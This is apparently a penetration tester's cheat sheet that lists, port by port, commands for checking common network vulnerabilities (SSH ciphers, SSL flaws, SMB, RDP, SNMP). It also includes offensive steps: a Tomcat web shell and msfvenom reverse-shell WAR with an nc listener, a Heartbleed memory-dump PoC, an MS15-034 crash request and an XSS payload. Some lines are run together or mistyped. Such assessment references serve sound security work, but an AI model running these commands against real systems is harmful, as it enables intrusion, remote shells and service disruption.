Penetration Testing - Network
Manual Vulnerability Assessment
TCP/21: FTP
Anonymous FTP Enabled
anonymous
guest
TCP/22: SSH
nmap -p 22 --script ssh2-enum-algos <ip_address>
SSH Weak Algorithms Supported
SSH Server CBC Mode Ciphers Enabled
ssh -oCiphers=<ciphers> <ip_address>
SSH Weak MAC Algorithms Enabled
ssh -oMACs=<algorithm> <ip_address>
SSH Protocol v1 Supported
ssh -1 <ip_address> -v
Ciphers aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com
TCP/23: Telnet
Unencrypted Telnet Server
telnet <ip_address> 23
TCP/25: SMTP
SMTP Service Cleartext Login Permitted
telnet <ip_address> 25
EHLO <ip_address>
AUTH LOGIN
nc <ip_address> 25
EXPN root
VRFY root
TCP/53: DNS
DNS Server Cache Snooping Remote Information Disclosure
nmap -sU -p 53 --script dns-cache-snoop <ip_address>
nslookup example.com <ip_address>
DNS Server Recursive Query Cache Poisoning Weakness
nmap -Pn -sU -p 53 --script=dns-recursion <ip_address>
DNS Server Spoofed Request Amplification DDoS
msf > use auxiliary/scanner/dns/dns_amp
dig . NS @<ip_address>
DNS Server Zone Transfer Information Disclosure (AXFR)
dig axfr @<ip_address> <domain.name>
MS11-058: Vulnerabilities in DNS Server Could Allow Remote Code Execution (2562485) (uncredentialed check)
MS12-017: Vulnerability in DNS Server Could Allow Denial of Service (2647170) (uncredentialed check)
MS12-017: Vulnerability in DNS Server Could Allow Denial of Service (2647170) (uncredentialed check)
dig @@<ip_address> version.bind txt chaos
TCP/79: Finger
Finger 0@host Information Disclosure
msf > use auxiliary/scanner/finger/finger_users
TCP/80: HTTP
HTTP TRACE / TRACK Methods Allowed
curl -v -X TRACE <ip_address>:<port>
MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553) (uncredentialed check)
*Vulnerable: HTTP/1.1 416 Requested Range Not Satisfiable
curl -v <ip_address>:<port>/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
Apache Server ETag Header Information Disclosure
curl -v -X GET <ip_address>:<port>
Please refer to https://www.axcelsec.com/2017/12/web-server-hardening-apache.html for more information.
TCP/110: SMTP
POP3 Cleartext Logins Permitted
telnet <ip_address> 110
USER testuser
PASS 123456
TCP/389: Lightweight Directory Access Protocol (LDAP)
LDAP NULL BASE Search Access
ldapsearch -h <ip_address> -x -s base
TCP/443: HTTPS
sslscan <ip_address>
SSL Version 2 and 3 Protocol Detection
openssl s_client -connect <ip_address>:<port> -ssl3
SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)
echo | timeout 3 openssl s_client -connect 10.171.72.7:10005 >/dev/null 2>&1; if [[ $? != 0 ]]; then echo "UNKNOWN: 10.171.72.7:10005 timeout or connection error"; else echo | openssl s_client -connect 10.171.72.7:10005 -ssl3 2>&1 | grep -qo "sslv3 alert handshake failure\|SSL3_GET_RECORD:wrong version number" && echo "OK: HOSTNAMEORIPADDRESS Not vulnerable" || echo "FAIL: 10.171.72.7:10005 vulnerable; sslv3 connection accepted"; fi
Heartbleed
python heartbleed-poc.py -n100 -f dump.bin <ip_address>
msf > use auxiliary/scanner/ssl/openssl_heartbleed
SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam)
openssl s_client -connect <ip_address>:<port_no> -cipher 'EXP'
SSL Certificate Chain Contains RSA Keys Less Than 2048 bits<openssl s_client -connect <ip_address>:<port> 2>/dev/null | openssl x509 -text -noout | grep "Public-Key"
SSL Certificate Signed Using Weak Hashing Algorithmopenssl s_client -connect 10.31.1.3:2381 2>/dev/null | openssl x509 -text -noout | grep "Signature Algorithm"
SSL Certificate Expiry
openssl s_client -connect <ip_address>:<port> | grep "notAfter"
SSL Certificate with Wrong Hostname
nmblookup -A 10.171.72.5 | grep '<00' | grep -v GROUP | awk '{print $1}'
SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
openssl s_client -connect <ip_address>:<port> | grep "Renegotiation"
Vulnerable: Secure Renegotiation IS NOT supportedSSL 64-bit Block Size Cipher Suites Supported (SWEET32)
openssl s_client -connect <ip_address>:<port> -cipher DES-CBC3-SHA
SSL RC4 Cipher Suites Supported (Bar Mitzvah)
openssl s_client -connect <ip_address>:<port> -cipher RC4-MD5
openssl s_client -connect <ip_address>:<port> -cipher RC4-SHA
ESXi Multiple Vulnerabilities
nmap --script vmware-version -p443 <ip_address>
https://<ip_address>/sdk/vim.wsdl
POST https://<ip_address>/sdk<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<operationID>00000001-00000001</operationID>
</soap:Header>
<soap:Body>
<RetrieveServiceContent xmlns="urn:internalvim25">
<_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
</RetrieveServiceContent>
</soap:Body>
</soap:Envelope>
Microsoft Exchange Server Unsupported Version Detection (Uncredentialed)
view-source:https://<ip_address>/owa
Microsoft Exchange Client Access Server Information Disclosure
openssl s_client -host <ip_address> -port 443
GET /autodiscover/autodiscover.xml HTTP/1.0
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
HTTP Response header WWW-Authenticate: Basic realm disclose server's internal IP address.
MS11-061: Vulnerability in Remote Desktop Web Access Could Allow Elevation of Privilege (2546250) (uncredentialed check)
https://<ip_address>/RDWeb/Pages/en-US/login.aspx?ReturnUrl=%22%20onmouseover%3d%22javascript%3aalert(%27Cross-site%20Scripting%27)
TCP/445: SMB
Microsoft Windows SMB NULL Session Authenticationrpcclient -U "" <ip_address>
smbclient -L <ip_address>
Exploitation:
smbclient //<ip_address>/IPC$ -N
SMB Signing Required
SMB Signing Disabled
nmap --script smb-security-mode -p445 <ip_address>
Microsoft Windows SMBv1 Multiple Vulnerabilities
nmap --script smb-protocols <ip_address>
MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)
nmap -p445 --script smb-vuln-ms17-010 <ip_address>
Concept
Request: Tree Connect AndX Request, Path: \\<IP_Address>\IPC$
Response: Tree Connect AndX Response
Request: PeekNamedPipe Request, FID: 0x0000
Response: Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES
To understand better with SMB Security, please read the article Server Message Block (SMB) Security.
TCP/512: Remote Process Execution
Rexecd Service Enablednmap <ip_address> --script rexec-brute -p512
TCP/1521: Oracle Database Default Listener
Oracle TNS Listener Remote Poisoningmsf > use auxiliary/scanner/oracle/tnspoison_checker
TCP/2049: Network File System (NFS)
NFS Shares World Readablenmap -sV --script=nfs-showmount <ip_address>
apt-get install nfs-common
showmount -e <ip_address>
mount -t nfs <ip_address>:/<direcotry> <local directory> -o nolock
TCP/8080: Apache Tomcat
Tomcat Application Manager LoginExploitation:
auxiliary/scanner/http/tomcat_mgr_login
\fuzzdb-master\web-backdoors\jsp\laudanum\cmd.war
http://<target IP>:8080/cmd/cmd.jsp?cmd=whoami
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP> LPORT=4444 -f war > shell.war
nc -l -v -p 4444
TCP/3389: Remote Desktop Connection (RDP)
Terminal Services Encryption Level is Medium or Lownmap -Pn --script rdp-enum-encryption -p3389 <ip_address>
Concept Request: ClientData
Response: ServerData - ServerSecurityData - encryptionLevel
Encryption Level *
1. Low
2. Client Compatible (Default)
3. High
4. FIPS Compliant
Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness
perl rdp-sec-check.pl <ip_address>
cpan Encoding::BER
Terminal Services Doesn't Use Network Level Authentication (NLA) Onlyrdesktop <ip_address>
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Executionnmap -p3389 --script rdp-vuln-ms12-020 <ip_address>
MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution (2992611) (uncredentialed check)
git clone https://github.com/anexia-it/winshock-test.git
./winshock_test.sh <ip_address> <port>
Concept
MS14-066 introduced four new SSL ciphers, so a check can be made if the target system supports those previously unsupported ciphers.
- DHE-RSA-AES256-GCM-SHA384
- DHE-RSA-AES128-GCM-SHA256
- AES256-GCM-SHA384
- AES128-GCM-SHA256
To understand better with RDP Security, please read the article Remote Desktop Protocol (RDP) Security.
UDP/123: NTP
Network Time Protocol (NTP) Mode 6 Scannerntpq -c rv <ip_address>
nmap -sU -p 123 --script ntp-info <ip_address>
The server should also not respond to the query.
Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS
ntpdc -n -c monlist
list of recent hosts to connect to this NTP server
UDP/161: SNMP
SNMP Agent Default Community Name (public)onesixtyone <ip_address> -c /usr/share/doc/onesixtyone/dict.txt
./snmpcheck-1.8.pl -t <ip_address> -c public
UDP/500: ISAKMP
Internet Key Exchange (IKE) Aggressive Mode with Pre-Shared Keyike-scan <ip_address> --id=test -A
UDP/5353: mDNS
mDNS Detectiondig @<ip_address> -p 5353 -t ptr _services._dns-sd._udp.local
Other Useful Commands
Update nmap and metasploitapt update; apt install metasploit-framework
apt-get install nmap